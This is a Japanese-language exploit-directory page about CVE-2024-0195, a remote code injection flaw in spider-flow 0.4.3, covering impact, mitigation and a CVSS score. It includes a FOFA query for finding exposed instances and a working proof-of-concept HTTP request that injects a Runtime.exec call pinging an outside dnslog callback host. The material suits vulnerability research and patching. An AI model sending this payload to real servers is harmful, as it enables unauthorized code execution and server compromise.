Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 コード生成の制御が不適切('コードインジェクション') | Kitploit
ツール/GitHubGitHub/gh-ost00/cve-2024-0195-spiderflow
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubgh-ost00/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 コード生成の制御が不適切('コードインジェクション')

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-0195 コード生成の制御の不適切('コードインジェクション')

概要

CVE-2024-0195 は、spider-flow 0.4.3 Web アプリケーションの FunctionController.java ファイル内の FunctionService.saveFunction 関数に存在する、重大なコードインジェクションの脆弱性です。攻撃者はリモートから悪意のあるコードを注入でき、そのコードがサーバー上で実行されます。これにより、アプリケーションの完全な侵害が可能になります。

影響

この脆弱性は、影響を受ける spider-flow アプリケーションをホストしているサーバー上でリモートコード実行を可能にするため、極めて深刻です。攻撃者はサーバーを完全に侵害し、機密データを窃取し、マルウェアや仮想通貨マイナーをインストールし、ネットワーク内部でのさらなる攻撃に悪用する可能性があります。アプリケーションとサーバーの機密性、完全性、可用性はすべて重大な影響を受けます。

パッチ

パッチ適用済みバージョンは明示されていないため、現時点ではパッチ適用は選択肢として存在しないようです。この脆弱性は公開されておりエクスプロイトも入手可能なため、直ちに緩和策を講じることが不可欠です。

緩和策

公式パッチがリリースされるまで、spider-flow 0.4.3 は直ちにオフラインにするか、信頼できるネットワーク/ユーザーのみにアクセスを制限すべきです。暫定的な緩和策として、Web アプリケーションファイアウォールやその他の入力検証コントロールを構成し、コードインジェクション攻撃の試みを検出・ブロックできる可能性があります。ただし、これらは完全な解決策ではなく、修正版がリリースされ次第、脆弱性のあるバージョンをアップグレードする必要があります。

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

悪用

FOFA : app="spiderflow"

✔ 概念実証

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
ツールをダウンロード